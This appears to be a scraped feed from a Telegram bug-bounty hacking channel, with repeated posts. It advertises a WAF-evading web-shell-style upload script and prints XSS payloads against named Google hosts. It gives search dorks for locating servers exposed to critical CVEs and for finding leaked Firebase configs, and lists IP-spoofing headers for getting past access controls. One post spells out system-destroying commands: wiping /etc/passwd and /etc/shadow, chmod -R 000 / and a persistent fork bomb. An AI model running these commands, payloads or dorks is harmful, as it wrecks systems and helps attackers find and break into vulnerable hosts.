Hey Hunters,
DarkShadow here again. We all know how frustrating it is to test file upload vulnerabilities—sometimes the file uploads, but you can’t execute it because WAFs or IDS jump in.
So, I’ve built a next-level, compact noscript that actually bypasses most WAF and IDS protections. It uses 3 stealth techniques to evade restrictions and offers 2 output modes for flexibility.
What makes it even cooler?
Wanna try it out? drop a comment and let me know. And of course, follow me on X → DarkShadow
#wafbypass
DarkShadow here again. We all know how frustrating it is to test file upload vulnerabilities—sometimes the file uploads, but you can’t execute it because WAFs or IDS jump in.
So, I’ve built a next-level, compact noscript that actually bypasses most WAF and IDS protections. It uses 3 stealth techniques to evade restrictions and offers 2 output modes for flexibility.
What makes it even cooler?
No password needed.
It uses a unique auth mechanism based on the User-Agent header—no login form, no cookies, nothing else. If your User-Agent matches, you’re in. If not, the noscript won’t even respond.
Wanna try it out? drop a comment and let me know. And of course, follow me on X → DarkShadow
#wafbypass
😱8👍7❤6🔥4🐳1🗿1
Hey Hunter's,
DarkShadow here back again. Dropping a Google XSS POC1😁
✅POC steps:
a simple XSS payload as usual😏
The vulnerability has been patched🥱
Don't forget to follow me 👉🏼 DarkShadow
#xss #poc #googlebug
DarkShadow here back again. Dropping a Google XSS POC1😁
✅POC steps:
Vuln host: aihub.cloud.google.com
Vuln param: /url?q= (GET method)
Tecniq: double url encoding
Payload: "><noscript/onload=alert(document.domain)>
a simple XSS payload as usual😏
The vulnerability has been patched🥱
Don't forget to follow me 👉🏼 DarkShadow
#xss #poc #googlebug
😱10👍7🔥4🫡2🗿1
⚡WaybackLister is a reconnaissance tool that taps into the Wayback Machine to fetch historical URLs for a domain, parses unique paths, and checks if any of those paths currently expose directory listings. It's fast, multithreaded, and built for practical use in security assessments and bug bounty recon.
✅http://github.com/anmolksachan/wayBackLister
✅ Join Telegram For More Content: t.me/brutsecurity
----------------------------------------------------------
🎓 Ready to Skill Up? Enroll Now → wa.link/brutsecurity
#CyberSecurity #BugBounty #EthicalHacking #Infosec #BrutSecurity
✅http://github.com/anmolksachan/wayBackLister
✅ Join Telegram For More Content: t.me/brutsecurity
----------------------------------------------------------
🎓 Ready to Skill Up? Enroll Now → wa.link/brutsecurity
#CyberSecurity #BugBounty #EthicalHacking #Infosec #BrutSecurity
❤9👍7🔥5
CVE-2025-27007: Privilege Escalation in OttoKit WordPress Plugin, 9.8 rating 🔥
Errors in the logic of the plugin's API could potentially lead to an attacker gaining access to the administrator account. According to Patchstack, exploitation of the vulnerability began just an hour after public disclosure!
Search at Netlas.io:
👉 Link: https://nt.ls/y4FXX
👉 Dork: http.body:"plugins/suretriggers"
Read more: https://patchstack.com/database/wordpress/plugin/suretriggers/vulnerability/wordpress-suretriggers-1-0-82-privilege-escalation-vulnerability?_s_id=cve
Errors in the logic of the plugin's API could potentially lead to an attacker gaining access to the administrator account. According to Patchstack, exploitation of the vulnerability began just an hour after public disclosure!
Search at Netlas.io:
👉 Link: https://nt.ls/y4FXX
👉 Dork: http.body:"plugins/suretriggers"
Read more: https://patchstack.com/database/wordpress/plugin/suretriggers/vulnerability/wordpress-suretriggers-1-0-82-privilege-escalation-vulnerability?_s_id=cve
👍14
Good morning hackers 🥱
Need more Google bug POC's? 😁
ㅤ
Need more Google bug POC's? 😁
ㅤ
👍33🔥8😁2🤝2
🔥Sensitive informations leaks vai fofa Dorking 💥
Hey Hunter's, DarkShadow back again dropping a simple and effective dork.
Fofa query:
If you guy's really enjoy to read my methodology's don't forget to follow me 👉🏼 DarkShadow
#dork #bugbountytips
Hey Hunter's, DarkShadow back again dropping a simple and effective dork.
Leaking firebase configurations👀Fofa query:
body="firebaseapp" && domain="example.com"
Or
(body="firebaseapp" || body="firebaseconfig") && host=".target_domain_name_only"
If you guy's really enjoy to read my methodology's don't forget to follow me 👉🏼 DarkShadow
#dork #bugbountytips
🗿8👍6❤4
Brut Security
🔥Sensitive informations leaks vai fofa Dorking 💥 Hey Hunter's, DarkShadow back again dropping a simple and effective dork. Leaking firebase configurations👀 Fofa query: body="firebaseapp" && domain="example.com" Or (body="firebaseapp" || body="firebaseconfig")…
Guy's read this hackerone report to know how to exploit further using this sensitive informations.
https://hackerone.com/reports/1447751
https://hackerone.com/reports/1447751
👍10
Hey Hunter's,
Dark Shadow here back again. Dropping a Google XSS POC-2😁
✅POC steps:
A simple payload can flip the game if you are use it in right place.😁
The vulnerability has been patched🥱
Let me know—aren’t you all interested to know that Google rewarded $31,337 for an SSRF vulnerability?
And
Don't forget to follow me 👉🏼 DarkShadow
#xss #googlebug
Dark Shadow here back again. Dropping a Google XSS POC-2😁
✅POC steps:
•Vuln host: books.google.com
•Xss type: stored based XSS
•Vuln param: book name noscript and publisher name parameter.
•Technique: direct inject the payload. Without any kind of encoding. (Reason: no input sanitization)
Payload: "><noscript/onload=prompt(1)>
A simple payload can flip the game if you are use it in right place.😁
The vulnerability has been patched🥱
Let me know—aren’t you all interested to know that Google rewarded $31,337 for an SSRF vulnerability?
And
Don't forget to follow me 👉🏼 DarkShadow
#xss #googlebug
🔥23🗿8👍4❤2🐳2
CVE-2025-20188: Use of Hard-coded Credentials in Cisco IOS XE, 10.0 rating 🔥🔥🔥
Due to hard-coded JWT, Cisco IOS XE instances may be vulnerable to arbitrary file uploads, path traversal, and arbitrary command execution. Catalyst controllers are primarily affected.
Search at Netlas.io:
👉 Link: https://nt.ls/BKkJI
👉 Dork: certificate.issuer_dn:"IOS-Self-Signed-Certificate"
Vendor's advisory: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-wlc-file-uplpd-rHZG9UfC
Due to hard-coded JWT, Cisco IOS XE instances may be vulnerable to arbitrary file uploads, path traversal, and arbitrary command execution. Catalyst controllers are primarily affected.
Search at Netlas.io:
👉 Link: https://nt.ls/BKkJI
👉 Dork: certificate.issuer_dn:"IOS-Self-Signed-Certificate"
Vendor's advisory: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-wlc-file-uplpd-rHZG9UfC
🔥6👍2😱1
Hey Hunter's,
If you're facing difficulties setting up Kali NetHunter, then Proot-Distro is a powerful and user-friendly alternative. It offers an easy and comprehensive solution for running multiple Linux distributions directly in Termux—no root required.
Explore it on GitHub:
https://github.com/termux/proot-distro
If you're facing difficulties setting up Kali NetHunter, then Proot-Distro is a powerful and user-friendly alternative. It offers an easy and comprehensive solution for running multiple Linux distributions directly in Termux—no root required.
Explore it on GitHub:
https://github.com/termux/proot-distro
👨💻5❤4🗿1
Hey Hunter's
DarkShadow here — back again with some killer techniques most bug bounty hunters overlook.
IP Spoofing Headers for Bypass & Testing:
Use: Bypass IP whitelisting, rate limits, geo-blocks, SSRF filters, or trigger internal behavior. Combine multiple for better results in black-box testing.
Don't forget to follow me 👉🏼 DarkShadow
#bugbountytips #wafbypass
DarkShadow here — back again with some killer techniques most bug bounty hunters overlook.
IP Spoofing Headers for Bypass & Testing:
X-Forwarded-For: 127.0.0.1
# Trusted by proxies/load balancers
X-Real-IP: 127.0.0.1
# Common in NGINX setups
X-Client-IP: 127.0.0.1
# Used for rate limiting/tracking
X-Remote-IP: 127.0.0.1
# May influence backend logic
X-Remote-Addr: 127.0.0.1
# Tries to override remote IP
True-Client-IP: 127.0.0.1
# Used by CDNs (e.g. Akamai)
CF-Connecting-IP: 127.0.0.1
# Cloudflare real IP header
Fastly-Client-IP: 127.0.0.1
# Fastly CDN client IP
X-Cluster-Client-IP: 127.0.0.1
# Seen in clustered environments
Forwarded: for=127.0.0.1
# RFC standard version of XFF
X-Originating-IP: 127.0.0.1
# Used by mail servers & legacy apps
X-Forwarded-Host: 127.0.0.1
# Can affect virtual host routing
X-Forwarded-Server: 127.0.0.1
# Backend routing logic
X-Real-Hostname: localhost
# Tries to spoof internal host
Via: 127.0.0.1
# May appear in proxy chains
Forwarded-For: 127.0.0.1
# Non-standard but seen in wild
Proxy-Client-IP: 127.0.0.1
# Java-based servers (Tomcat)
WL-Proxy-Client-IP: 127.0.0.1
# WebLogic-specific header
Use: Bypass IP whitelisting, rate limits, geo-blocks, SSRF filters, or trigger internal behavior. Combine multiple for better results in black-box testing.
Don't forget to follow me 👉🏼 DarkShadow
#bugbountytips #wafbypass
🔥23❤7👍4🗿3🤝2
This is not for hacking, this is for hackers;
If you're still not found anything in your bug hunting, then first apply this code in your file:
Never give up, just you have need to change your mind set-up.
Remember, where everyone give up pro's started there😌
If you're still not found anything in your bug hunting, then first apply this code in your file:
while(!success){
tryagain();
if(tried)
break;
}
Never give up, just you have need to change your mind set-up.
Remember, where everyone give up pro's started there😌
🤝23❤13👍5
⚠️Don't try these DarkShadow's commands:
Just dropping DarkShadow's bash nuclear some of demo commands🚨
1️⃣👉🏼Overwrite /etc/passwd and /etc/shadow
Destroys all user accounts, including root.
Result: Nobody can login anymore — system is fcked.
2️⃣👉🏼Make the system unusable (chmod all permissions)
Remove all permissions (read/write/execute) from all files and folders.
Result: You can't even ls or login properly. Full chaos.
3️⃣👉🏼Persistent Fork Bomb (auto start even after reboot)
Adds the fork bomb into startup files (.bashrc or /etc/bash.bashrc).
Result: As soon as anyone logs in, the machine crashes.
Hard to recover unless you boot into recovery mode and manually edit.
Just dropping DarkShadow's bash nuclear some of demo commands🚨
1️⃣👉🏼Overwrite /etc/passwd and /etc/shadow
echo "" > /etc/passwd
echo "" > /etc/shadow
Destroys all user accounts, including root.
Result: Nobody can login anymore — system is fcked.
2️⃣👉🏼Make the system unusable (chmod all permissions)
chmod -R 000 /
Remove all permissions (read/write/execute) from all files and folders.
Result: You can't even ls or login properly. Full chaos.
3️⃣👉🏼Persistent Fork Bomb (auto start even after reboot)
echo ':(){ :|:& };:' >> ~/.bashrc
or for all users:
echo ':(){ :|:& };:' >> /etc/bash.bashrc
Adds the fork bomb into startup files (.bashrc or /etc/bash.bashrc).
Result: As soon as anyone logs in, the machine crashes.
Hard to recover unless you boot into recovery mode and manually edit.
😱12👍9🫡7❤6
ShodanX⚡️– A terminal-powered recon and OSINT tool built on top of the Shodan Services to gather information of targets using shodan dorks ✨
✅Link - https://github.com/RevoltSecurities/Shodanx
👀 @mrz_0047
#BugBounty #cybersecurity #infosec #shodan
✅Link - https://github.com/RevoltSecurities/Shodanx
#BugBounty #cybersecurity #infosec #shodan
Please open Telegram to view this post
VIEW IN TELEGRAM
1❤18👍2